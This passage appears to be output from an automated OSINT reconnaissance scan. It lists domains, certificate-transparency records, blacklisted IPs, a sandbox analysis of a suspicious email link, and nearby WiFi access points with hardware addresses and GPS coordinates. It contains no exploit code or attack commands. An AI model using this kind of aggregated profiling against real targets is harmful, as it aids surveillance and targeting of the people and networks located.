{"record_type": "A", "resolved_at": "2023-03-17T16:27:10.957414808Z"}}, "names": ["www.felixnrc.ar", "maxkross.github.io", "www.fanfit.com.au", "comics.bilardi.net", "sar.portal2.sr", "cyberfriendscircle.io", "www.maloley.me", "varshaprasad.com", "www.jinhankim.com", "www.wise.fitness", "yomikang.com", "kleinsplayground.com", "lainamae.github.io", "www.umeerrama.com", "derekmagill.net", "intersolarnft.github.io", "dhanush.is-a.dev", "gmacd.net", "elvishenry.github.io", | 185.199.108.153 |
| 2023-05-12 03:18:53 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | 200WMadison (Net ID: 00:01:21:30:9B:1A) | 41.8781, -87.6298 |
| 2023-05-12 03:13:08 | Malicious Co-Hosted Site | Yes | OpenPhish | 0 | 0 | 3 | 0 | None | OpenPhish [00theway.github.io]
https://www.openphish.com/feed.txt | 00theway.github.io |
| 2023-05-12 02:44:16 | Internet Name | No | DNS Resolver | 4 | 0 | 2 | 0 | None | www.battleb0t.xyz | [{u'pubkey_sha256': u'b1d8ad495b85281ccdd8ee8835d1b0223d8372b54869daf463e92de6ed172160', u'cert_sha256': u'3d687aa671181674e4491f35d4a504fe8ede2a23edcb11a1a5f1573f42d7a75d', u'revoked': False, u'not_after': u'2023-05-14T15:23:50Z', u'not_before': u'2023-02-13T15:23:51Z', u'cert': {u'data': u'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', u'sha256': u'3d687aa671181674e4491f35d4a504fe8ede2a23edcb11a1a5f1573f42d7a75d', u'type': u'cert'}, u'dns_names': [u'nuke.battleb0t.xyz'], u'tbs_sha256': u'2c51d3eac2fd15713d1b21dd3bb3fdf96ca51847d8b13529deb5504b935d64ba', u'id': u'4818192950', u'issuer': {u'pubkey_sha256': u'8d02536c887482bc34ff54e41d2ba659bf85b341a0a20afadb5813dcfbcf286d', u'friendly_name': u"Let's Encrypt", u'name': u"C=US, O=Let's Encrypt, CN=R3"}}, {u'pubkey_sha256': u'2307411ab1a35cbd27d910826dd73a859c805fd0ba153a66badcd9b93076677b', u'cert_sha256': u'2cdb8130792ebedf9ac0d58415aa9e7a972b41beabd3a80ba0f9545951c3653a', u'revoked': False, u'not_after': u'2023-05-25T03:02:52Z', u'not_before': u'2023-02-24T03:02:53Z', u'cert': {u'data': u'MIIFKjCCBBKgAwIBAgISA5eZXGCsQGj4st4KZ3rat9EWMA0GCSqGSIb3DQEBCwUAMDIxCzAJBgNVBAYTAlVTMRYwFAYDVQQKEw1MZXQncyBFbmNyeXB0MQswCQYDVQQDEwJSMzAeFw0yMzAyMjQwMzAyNTNaFw0yMzA1MjUwMzAyNTJaMB4xHDAaBgNVBAMTE2ZsdWlkLmJhdHRsZWIwdC54eXowggEiMA0GCSqGSIb3DQEBAQUAA4IBDwAwggEKAoIBAQDtvNBxdfnBUXlJ+CVs4kt6BeErbHlEmP+yzLzX2iclKTfHuoDL4Xy4TTeivJNE67xi/0fLIeo9BUwEV4KTW6klKfuYM7AEdKq8mmRex+Js5ewq50Br4XWTObPPuOkRKebRnghWVBafwR0f9fbKSDqUUwMdv1KvbiedgI3wVyjU8AE09DlZSt+fAEeHmjk4wY+EigILsm5cNqL2NebSI2spsRWqhqNb6zDMr7jf1Q6Pjil+DSEo0NJMcVsZAZvcuZCIffxdPnJE5kYR3eb9pUKjByTnKdkpHPNyd4vLC99FNAuBqADe8BN0G78vYa1lcyk+BbXDkCiMlu/Lswa6m2v3AgMBAAGjggJMMIICSDAOBgNVHQ8BAf8EBAMCBaAwHQYDVR0lBBYwFAYIKwYBBQUHAwEGCCsGAQUFBwMCMAwGA1UdEwEB/wQCMAAwHQYDVR0OBBYEFMSFgqNe7U1U6Q29Aqxnsvrz4Vg/MB8GA1UdIwQYMBaAFBQusxe3WFbLrlAJQOYfr52LFMLGMFUGCCsGAQUFBwEBBEkwRzAhBggrBgEFBQcwAYYVaHR0cDovL3IzLm8ubGVuY3Iub3JnMCIGCCsGAQUFBzAChhZodHRwOi8vcjMuaS5sZW5jci5vcmcvMB4GA1UdEQQXMBWCE2ZsdWlkLmJhdHRsZWIwdC54eXowTAYDVR0gBEUwQzAIBgZngQwBAgEwNwYLKwYBBAGC3xMBAQEwKDAmBggrBgEFBQcCARYaaHR0cDovL2Nwcy5sZXRzZW5jcnlwdC5vcmcwggECBgorBgEEAdZ5AgQCBIHzBIHwAO4AdQC3Pvsk35xNunXyOcW6WPRsXfxCz3qfNcSeHQmBJe20mQAAAYaBlpBHAAAEAwBGMEQCICjxcLLm9aGcwyq5mLfK3kYGig39XVFiap6vpxj4VtGwAiAhpNN7m5SlM1cl6vnpa33bPptwrJlHu2Ch2NSf4J/0RAB1AK33vvp8/xDIi509nB4+GGq0Zyldz7EMJMqFhjTr3IKKAAABhoGWkIMAAAQDAEYwRAIgPen/cKNLJEXeMs3B69ZoUOiQORdwZS/DjifvjwosEkICIGO9t4hTEa50wIw+3Zov1uU0pIyiq0OMZH6b0o6QCM5gMA0GCSqGSIb3DQEBCwUAA4IBAQB+MVu1xgwWJwv1GrOAp+9eXxuHOLeKvlxLKj8oK0+HX8K007e++Cj1FcezPz1AtAOklQYBGlgfdTZL7GVa4P2wv0Hj/1dO3QVHLOV0yFpYGdZTYfaNDhkpXd2yE+jFTH5o3PK0BVoTjtIuTl6BEKWGjzAw92FKb1wXDaTvEwIFSLAYrJzfJHAS40SsMVT1tpL07LbnFpMjx7h+UVz3BTMcDnqzPe0hA9K8pb8QgR9MedQ6c7mTn1eLmOo+dDlwmT06wPJN4VXt3ElOpjmlguotbukXxnJ17BBy0Mk+uTBpvC9wBjy6MbbBDEXmkoh4VjrUDNIyuEk388RtFWlUmQrZ', u'sha256': u'2cdb8130792ebedf9ac0d58415aa9e7a972b41beabd3a80ba0f9545951c3653a', u'type': u'cert'}, u'dns_names': [u'fluid.battleb0t.xyz'], u'tbs_sha256': u'8146e2bbb69c6bf3a769558c8c5ae10b8e6243d42611ba7db2c4f0b16bf71146', u'id': u'4865007011', u'issuer': {u'pubkey_sha256': u'8d02536c887482bc34ff54e41d2ba659bf85b341a0a20afadb5813dcfbcf286d', u'friendly_name': u"Let's Encrypt", u'name': u"C=US, O=Let's Encrypt, CN=R3"}}, {u'pubkey_sha256': u'5a0559923d0fdaac1fc6a74472ffcb94c92e25a29d8d9a48166bcad2947f18e1', u'cert_sha256': u'9e1451e17fa41309ec5c8a34246eeed3388677fd9907141ad0f5dedc2241e10e', u'revoked': False, u'not_after': u'2023-05-25T03:05:10Z', u'not_before': u'2023-02-24T03:05:11Z', u'cert': {u'data': u'MIIFMTCCBBmgAwIBAgISBJEIZbRWlOOJN2vI7lr89IBSMA0GCSqGSIb3DQEBCwUAMDIxCzAJBgNVBAYTAlVTMRYwFAYDVQQKEw1MZXQncyBFbmNyeXB0MQswCQYDVQQDEwJSMzAeFw0yMzAyMjQwMzA1MTFaFw0yMzA1MjUwMzA1MTBaMCExHzAdBgNVBAMTFm9sZGZsdWlkLmJhdHRsZWIwdC54eXowggEiMA0GCSqGSIb3DQEBAQUAA4IBDwAwggEKAoIBAQCXS5qUM658XpEb2FQiye1Pjdwc6oLnwWa4DnrXaX6XESwapQ5kFhLVlLMj8jbUT+vVMlCs5NdmG+PakXkEZvQt+j5F9EiRGo2AgsrdZhjN8p2HDZYJNvCQUHSzj9HUq+U8uqatV2IiK2DebnYEAl36UoC3YWvKiQ5ROMPyTcGPPlwvhux67sSpCWf+OjYs9HHdY1LHfiQTO/hkrA8XZYtPEtu6i5bXp9Nc/Y/pJrDB086upICbjZsf9spKiE++7SgvRRKN7ShK4dcK0cxPOA/6ky2NSpI6iIIBJKdiUpWIy/Uh604fFFn7oPNTbG4g4coLg0Y2NMYiFxvY5oIkaMplAgMBAAGjggJQMIICTDAOBgNVHQ8BAf8EBAMCBaAwHQYDVR0lBBYwFAYIKwYBBQUHAwEGCCsGAQUFBwMCMAwGA1UdEwEB/wQCMAAwHQYDVR0OBBYEFNUp10YCZXNl/PWnfC5vlnnYZ6TmMB8GA1UdIwQYMBaAFBQusxe3WFbLrlAJQOYfr52LFMLGMFUGCCsGAQUFBwEBBEkwRzAhBggrBgEFBQcwAYYVaHR0cDovL3IzLm8ubGVuY3Iub3JnMCIGCCsGAQUFBzAChhZodHRwOi8vcjMuaS5sZW5jci5vcmcvMCEGA1UdEQQaMBiCFm9sZGZsdWlkLmJhdHRsZWIwdC54eXowTAYDVR0gBEUwQzAIBgZngQwBAgEwNwYLKwYBBAGC3xMBAQEwKDAmBggrBgEFBQcCARYaaHR0cDovL2Nwcy5sZXRzZW5jcnlwdC5vcmcwggEDBgorBgEEAdZ5AgQCBIH0BIHxAO8AdgC3Pvsk35xNunXyOcW6WPRsXfxCz3qfNcSeHQmBJe20mQAAAYaBmKzyAAAEAwBHMEUCICWgaft/PmN9oILwvZn6/4Qgr8WGgSRL98ur+169a4dWAiEAilZEKCsL5dY69BV+Cjy6gEc40xNl1o6o5QEE0+3XKCQAdQB6MoxU2LcttiDqOOBSHumEFnAyE4VNO9IrwTpXo1LrUgAAAYaBmK0EAAAEAwBGMEQCIEhQdyenjelORFvktFZQ+yD8yP0PS9xoCKRWpUv1pUezAiBBtKAPIhxp6PP7YLKBYWLg3Sg3E350KyZ04f3lTSlh5zANBgkqhkiG9w0BAQsFAAOCAQEAYbTvc/w81jb1dYAMM4uaBQvE73IdaXSV/QqEvbi5PBKH0+sttdJjKilgWcQRHA/D+3kvikNXOGLYLmg0u2wOeuP4PfXBBaVtk7mzSCKOozlm5qWe3OKYNX6z4ceyFrewLnBQTuqT0PhcaWwb0j7u2mQfrZfIvhc4pu2SnjvbZ8iwX+av/fdXknuHPb/EwSETusTYhaNj3JDu3z0qvANOuhuMDBZ+WOOsf9w7QBgfdJjVxPoymZWgZB5bTaj1eTMuP0PcjQ59KCV0epMnUy5rrk2BwTzgzUICbfza81JX1bFwjhqRFcgbk81AuP8p58YFrWOMyOzX6Ygzo11DodW5IA==', u'sha256': u'9e1451e17fa41309ec5c8a34246eeed3388677fd9907141ad0f5dedc2241e10e', u'type': u'cert'}, u'dns_names': [u'oldfluid.battleb0t.xyz'], u'tbs_sha256': u'11231ecf169618aac453b5e600bca74016c90998389238bc78e25a336ea53b60', u'id': u'4865013513', u'issuer': {u'pubkey_sha256': u'8d02536c887482bc34ff54e41d2ba659bf85b341a0a20afadb5813dcfbcf286d', u'friendly_name': u"Let's Encrypt", u'name': u"C=US, O=Let's Encrypt, CN=R3"}}, {u'pubkey_sha256': u'b65f3ba1cf72aeba89e3a802dee04c06a05e779c0cfeacdd6cb8cefb55c4e2da', u'cert_sha256': u'cb894c56576f5179076d6e1c59c2fc91b3c72b3d588e1a67aa08729c92b84b1f', u'revoked': False, u'not_after': u'2023-05-26T01:39:24Z', u'not_before': u'2023-02-25T01:39:25Z', u'cert': {u'data': u'MIIFNTCCBB2gAwIBAgISBLY5M6/eHjLz/C523LwIUYYQMA0GCSqGSIb3DQEBCwUAMDIxCzAJBgNVBAYTAlVTMRYwFAYDVQQKEw1MZXQncyBFbmNyeXB0MQswCQYDVQQDEwJSMzAeFw0yMzAyMjUwMTM5MjVaFw0yMzA1MjYwMTM5MjRaMBgxFjAUBgNVBAMTDWJhdHRsZWIwdC54eXowggEiMA0GCSqGSIb3DQEBAQUAA4IBDwAwggEKAoIBAQCrxxsM7cYB+Oqps88IF0+iy3w0xGYS5u/zmBd5yWXuZkwfmpJ9M+4H+i4VYve08x/VTy6xZ6hJQr/jzJq3MEbCaPUoqWRpb0xLZCTJ3O1Gn6Qfwu9vNtC8aSe44tYYcEAstPXuj/cNjG4Dkudd1j68u8lbKBCgWvY39eGeFSNybo5pAQmkjKTJ19sFAZBIS5AgjDh6CmB0eRgmMI5gCxe5JKCA3z8UANMJ5zRHNWN8VNKgneFX0csT0zwwJJeO6jQAn8xsDGr3VLxeYNxGMcIJ3tnD42MejxzFkJDo2oa+ffHDHxqGaZsL4LIMRwjIklkrZi/6oTihLxBl9pf9FoczAgMBAAGjggJdMIICWTAOBgNVHQ8BAf8EBAMCBaAwHQYDVR0lBBYwFAYIKwYBBQUHAwEGCCsGAQUFBwMCMAwGA1UdEwEB/wQCMAAwHQYDVR0OBBYEFGNOFYVWWqSUAsIWQqSll5o4AleXMB8GA1UdIwQYMBaAFBQusxe3WFbLrlAJQOYfr52LFMLGMFUGCCsGAQUFBwEBBEkwRzAhBggrBgEFBQcwAYYVaHR0cDovL3IzLm8ubGVuY3Iub3JnMCIGCCsGAQUFBzAChhZodHRwOi8vcjMuaS5sZW5jci5vcmcvMCsGA1UdEQQkMCKCDWJhdHRsZWIwdC54eXqCEXd3dy5iYXR0bGViMHQueHl6MEwGA1UdIARFMEMwCAYGZ4EMAQIBMDcGCysGAQQBgt8TAQEBMCgwJgYIKwYBBQUHAgEWGmh0dHA6Ly9jcHMubGV0c2VuY3J5cHQub3JnMIIBBgYKKwYBBAHWeQIEAgSB9wSB9ADyAHcAejKMVNi3LbYg6jjgUh7phBZwMhOFTTvSK8E6V6NS61IAAAGGhnCAVAAABAMASDBGAiEAh/Y8suDCe/RZMkn/hO7hrF2hfoTeuKySO5eYbccRB9ACIQCOoXkcH72OFd6rl/5A4dnCHD5VPTnfiLg+MDLqz1Gg8wB3AOg+0No+9QY1MudXKLyJa8kD08vREWvs62nhd31tBr1uAAABhoZwgDYAAAQDAEgwRgIhAMDKSjoBecX3TRhscOh0pPwxXkb/27xVeRxr0yp3M5J9AiEAs2yzzZRuQAdUQ84z4D/CSUjcGSNE5J2LfuF/Rs4Y77YwDQYJKoZIhvcNAQELBQADggEBALLjqCzluns+jvveBcnb3xDhOkrUyOkWdjExuB2H40IVXNkB0eMhFJYNA9arKrtu2pcQ/rEDSKt+bXuWbeA6WumULoOuP6iljCU6qcUdY4oNVU1UyDoX1HJydnidKSo73vUKTNhEgh8aKcxcLL9+23F8UOOR/pU/04dfMDdI7GO2oawzrGMFso9t7p4urFBZ6UFG0nFlBRdC2T4hndeQOaaPLehK1P9tnjLGggWPpLV0tHDfKEtQyBs2Gq7Pe6uSI+Z3l/JHpLBS8p3PvmiiivIv8GYL0zQqx4o1xBwzLeWQ3lanl4Z8l8lFj5lhIgA9qrKHDTW7TPP4HPiZwejRMMY=', u'sha256': u'cb894c56576f5179076d6e1c59c2fc91b3c72b3d588e1a67aa08729c92b84b1f', u'type': u'cert'}, u'dns_names': [u'battleb0t.xyz', u'www.battleb0t.xyz'], u'tbs_sha256': u'5d9c34221e2de124f32114bf34c005fc414285d1b7cc7cab0bb0bd4e745c7797', u'id': u'4869370950', u'issuer': {u'pubkey_sha256': u'8d02536c887482bc34ff54e41d2ba659bf85b341a0a20afa |
| 2023-05-12 03:18:56 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | myLGNetFBC6 (Net ID: 00:01:36:5A:FB:C4) | 37.7813933,-122.3918002 |
| 2023-05-12 03:18:51 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | TraventHome (Net ID: 00:01:24:F0:1D:C3) | 37.7642, -122.3993 |
| 2023-05-12 03:32:52 | Non-Standard HTTP Header | No | Strange Header Identifier | 0 | 0 | 3 | 0 | None | cf-mitigated: challenge | {"content-encoding": "gzip", "nel": "{\"success_fraction\":0,\"report_to\":\"cf-nel\",\"max_age\":604800}", "referrer-policy": "same-origin", "permissions-policy": "accelerometer=(),autoplay=(),camera=(),clipboard-read=(),clipboard-write=(),fullscreen=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()", "cross-origin-resource-policy": "same-origin", "transfer-encoding": "chunked", "alt-svc": "h3=\":443\"; ma=86400, h3-29=\":443\"; ma=86400", "expires": "Thu, 01 Jan 1970 00:00:01 GMT", "vary": "Accept-Encoding", "server": "cloudflare", "connection": "close", "report-to": "{\"endpoints\":[{\"url\":\"https:\\/\\/a.nel.cloudflare.com\\/report\\/v3?s=fiT%2Fr8CwWrAQPZkt8VpkeQoVoGOR6HuHPRasaTPIcW93tfGJar9pTikOfGdSWQA5SZHUpCyuk56gghqLlY9yU5dVDbV5Bs9yRYYuQ0D9hZe3tyWEFUstq9XRCg%3D%3D\"}],\"group\":\"cf-nel\",\"max_age\":604800}", "cf-mitigated": "challenge", "cache-control": "private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0", "date": "Fri, 12 May 2023 03:24:21 GMT", "x-frame-options": "SAMEORIGIN", "cross-origin-embedder-policy": "require-corp", "content-type": "text/html; charset=UTF-8", "cf-ray": "7c5f8c594cb34339-EWR", "cross-origin-opener-policy": "same-origin"} |
| 2023-05-12 03:00:13 | Internet Name - Unresolved | No | Certificate Transparency | 0 | 0 | 1 | 0 | None | webdisk.ayhu.xyz | ayhu.xyz |
| 2023-05-12 03:09:56 | Affiliate - Internet Name | No | DNS Resolver | 0 | 0 | 3 | 0 | None | dgn.keyubu.com | 87.248.157.106 |
| 2023-05-12 03:01:28 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.97.15): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.97.0/24 |
| 2023-05-12 03:19:09 | Account on External Site | No | Account Finder | 0 | 0 | 6 | 0 | None | social_msdn (Category: social)
https://social.msdn.microsoft.com/profile/login | login |
| 2023-05-12 03:18:51 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | <no ssid> (Net ID: 00:02:2D:20:8C:1A) | 37.7642, -122.3993 |
| 2023-05-12 03:18:58 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | default (Net ID: 00:05:5D:ED:08:8A) | 33.336199,-111.89446440830702 |
| 2023-05-12 03:38:36 | Blacklisted Affiliate IP Address | Yes | UCEPROTECT | 0 | 0 | 4 | 0 | None | UCEPROTECT - Level 2 (some false positives) (46.101.229.68) | 46.101.229.68 |
| 2023-05-12 03:18:57 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | Twist Studio (Net ID: 00:02:2D:07:96:23) | 37.780462,-122.390564 |
| 2023-05-12 03:01:20 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.96.174): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.96.0/24 |
| 2023-05-12 03:18:54 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 4 | 0 | None | VEBNG (Net ID: 00:02:6F:75:9C:1E) | 50.1188, 8.6843 |
| 2023-05-12 02:58:57 | SSL Certificate - Raw Data | No | Certificate Transparency | 0 | 0 | 1 | 0 | None | Certificate:
Data:
Version: 3 (0x2)
Serial Number:
0d:40:8d:d9:7c:a1:bd:4c:0d:06:c5:3f:c3:e9:2e:bc
Signature Algorithm: sha256WithRSAEncryption
Issuer: C=US, O=Google Trust Services LLC, CN=GTS CA 1P5
Validity
Not Before: Apr 11 04:54:50 2023 GMT
Not After : Jul 10 04:54:49 2023 GMT
Subject: CN=*.ayhu.xyz
Subject Public Key Info:
Public Key Algorithm: rsaEncryption
RSA Public-Key: (2048 bit)
Modulus:
00:a5:65:fa:d8:79:b7:aa:9f:cd:61:b9:6d:61:bb:
e3:07:27:16:d3:e1:46:58:db:ea:35:f8:26:d8:c8:
09:7e:b6:39:79:12:45:7f:4a:96:c2:65:47:bc:37:
b3:76:46:83:08:24:7b:32:63:f5:07:b6:17:66:20:
18:e4:18:8c:6e:16:7f:bc:81:ec:10:38:cc:20:6d:
2c:d6:29:65:3d:24:15:7a:78:2a:d0:43:3c:46:03:
10:b3:27:47:c6:2c:d9:37:1a:f8:11:aa:82:ad:00:
76:a7:88:0c:2b:f1:1a:b2:9a:95:76:c4:a9:4b:c3:
62:f9:12:87:35:9a:50:60:71:89:06:0b:f5:83:3f:
b3:37:8b:3d:cb:f9:c2:99:ee:99:d3:c8:08:07:e1:
c6:20:fc:1e:cb:95:74:f5:c1:74:33:8b:1b:39:2e:
63:89:98:62:bd:9a:c6:13:b2:b5:95:ec:cb:ee:ce:
27:e7:da:24:f1:8e:b6:e6:ab:e2:7a:20:63:e1:26:
ab:e8:05:03:30:6e:ae:59:d4:02:26:10:36:ee:3d:
2a:f4:c0:78:59:fa:77:cd:2a:88:bd:16:94:1a:e1:
c4:ca:d8:5b:b7:12:2e:db:10:0e:ec:94:77:40:49:
b3:6f:75:18:22:d3:cb:58:3c:44:d0:05:e2:db:a8:
00:c9
Exponent: 65537 (0x10001)
X509v3 extensions:
X509v3 Key Usage: critical
Digital Signature, Key Encipherment
X509v3 Extended Key Usage:
TLS Web Server Authentication
X509v3 Basic Constraints: critical
CA:FALSE
X509v3 Subject Key Identifier:
BA:51:29:0E:2E:1D:B8:E3:1A:BA:7C:11:8D:3C:69:BB:27:B0:51:A7
X509v3 Authority Key Identifier:
keyid:D5:FC:9E:0D:DF:1E:CA:DD:08:97:97:6E:2B:C5:5F:C5:2B:F5:EC:B8
Authority Information Access:
OCSP - URI:http://ocsp.pki.goog/s/gts1p5/TQXQbT5nMS4
CA Issuers - URI:http://pki.goog/repo/certs/gts1p5.der
X509v3 Subject Alternative Name:
DNS:*.ayhu.xyz, DNS:ayhu.xyz
X509v3 Certificate Policies:
Policy: 2.23.140.1.2.1
Policy: 1.3.6.1.4.1.11129.2.5.3
X509v3 CRL Distribution Points:
Full Name:
URI:http://crls.pki.goog/gts1p5/PX7fR59yV-s.crl
CT Precertificate Poison: critical
NULL
Signature Algorithm: sha256WithRSAEncryption
35:8a:d2:67:fd:ed:b1:23:72:f0:a2:4c:97:ee:c5:7e:e1:b0:
84:de:17:e3:7f:b0:fd:4c:e4:f5:d9:c1:87:4a:b8:32:d6:97:
13:2d:ab:c3:d8:0c:ce:60:02:7a:3d:d5:8b:4f:9b:89:37:1e:
07:e8:65:4f:13:db:bc:f2:3f:ba:ea:3a:b7:97:d8:a0:c0:4a:
65:8c:35:35:fd:69:77:08:6c:3c:bf:e2:a6:4a:02:ca:fc:ed:
e5:52:89:bc:c1:b6:61:98:79:3c:a3:31:8c:d6:1d:49:4c:6e:
4f:51:4b:80:2f:a3:0a:eb:fd:a0:1d:23:01:9e:b7:13:91:2e:
ea:39:a6:6a:a5:6e:65:a0:60:47:cf:fa:44:01:e4:af:f2:74:
c6:c0:9c:28:45:d7:eb:58:39:c7:39:24:41:f2:f3:e3:a3:aa:
8b:59:5c:05:a1:91:0e:a2:f0:b0:ab:cb:39:e8:59:97:1b:9f:
8d:d8:c2:47:ab:c2:d9:46:03:7a:5d:eb:fd:3e:65:0d:f9:fe:
dc:1b:a2:95:80:34:f0:64:f6:d6:5a:43:e4:2b:5f:53:8b:84:
65:53:97:2f:8f:bb:f4:1d:f8:10:82:18:da:d2:33:31:94:ea:
59:b0:de:49:31:a7:28:65:0c:5e:e7:fb:cf:58:f0:de:70:9b:
5c:67:53:d1
| ayhu.xyz |
| 2023-05-12 03:25:17 | Internet Name | No | DNS Brute-forcer | 0 | 0 | 1 | 0 | None | www.ayhu.xyz | ayhu.xyz |
| 2023-05-12 02:54:16 | Linked URL - Internal | No | Web Spider | 3 | 0 | 2 | 0 | None | https://oldfluid.battleb0t.xyz/ | oldfluid.battleb0t.xyz |
| 2023-05-12 02:51:40 | Raw Data from RIRs | No | Hybrid Analysis | 0 | 0 | 2 | 0 | None | [{u'subsystem': None, u'classification_tags': [], u'crowdstrike_ai': {u'executable_process_memory_analysis': [], u'analysis_related_urls': [{u'url': u'http://this.props.pagesize/2)),e.currentdatapageendindex=math.min(e.currentdatapagestartindex+this.props.pagesize,this.props.rows.length-1),r=!0', u'type': u'extracted', u'verdict': u'suspicious'}]}, u'total_processes': 23, u'threat_score': None, u'compromised_hosts': [], u'environment_id': 160, u'major_os_version': None, u'submit_name': u'http://email.energypreciousplus.com/?qs=202284189811717324811030210873145040889', u'signatures': [{u'category': u'General', u'origin': u'Created Mutant', u'identifier': u'mutant-0', u'name': u'Creates mutants', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 4, u'description': u'"Local\\SM0:7728:120:WilError_01"\n "SM0:7728:120:WilError_01"\n "Local\\SM0:7728:304:WilStaging_02"\n "InternetShortcutMutex"\n "SM0:7728:304:WilStaging_02"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-1', u'name': u'Contacts server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"51.38.209.93:80"\n "138.91.254.96:443"\n "104.21.12.87:443"\n "104.21.39.188:443"\n "104.17.24.14:443"\n "104.21.24.239:443"\n "185.199.108.153:443"\n "142.251.46.202:443"\n "142.251.46.163:443"\n "35.190.80.1:443"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-0', u'name': u'Contacts domains', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"email.energypreciousplus.com"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-51', u'name': u'Queries DNS server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071/004', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071.004', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"a.nel.cloudflare.com"\n "api.edgeoffer.microsoft.com"\n "cdnjs.cloudflare.com"\n "email.energypreciousplus.com"\n "fonts.googleapis.com"\n "fonts.gstatic.com"\n 